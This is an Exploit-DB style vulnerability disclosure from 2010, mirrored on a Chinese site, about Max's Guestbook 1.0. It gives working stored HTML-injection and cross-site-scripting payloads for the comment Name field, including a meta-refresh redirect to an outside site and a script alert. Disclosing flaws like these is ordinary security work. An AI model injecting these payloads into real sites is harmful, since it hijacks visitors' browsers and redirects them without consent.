Max’s Guestbook – HTML Injection / Cross-Site Scripting - 体验盒子

作者： MiND C0re

日期： 2010-08-29

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14834/

================================================================
# In the name of ALLAH ! #
======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#_____ __ __ /___/#
# / ___/\ \/ / / / #
#(__) \ \/ / / /#
# /____/ \__//_/ #
#################################
########################################################################
# Name: Max's Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.phpf1.com/download.html?item=18
# Date: 2010-08-15
# Author: MiND
# Greets: Sa-ViRuS.CoM,RENO,Dr.php,!BaD BoY!,Gov.HaCker,AntiSeCuRe,Dr.$audi...
# Contact: SlaSHMiND@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################


[~] HTML Injection Vuln . :
Add A New Comment And The exploit is in Name :)
<meta http-equiv="refresh" content="0;url=http://sa-virus.com/" /> 
( thats redirecting to sa-virus.com ) 


[~] Xss Vuln. : 
Add A New Comment And The exploit is in Name :)
<script>alert('MiND - Sa-ViRuS.CoM')</script>



Peace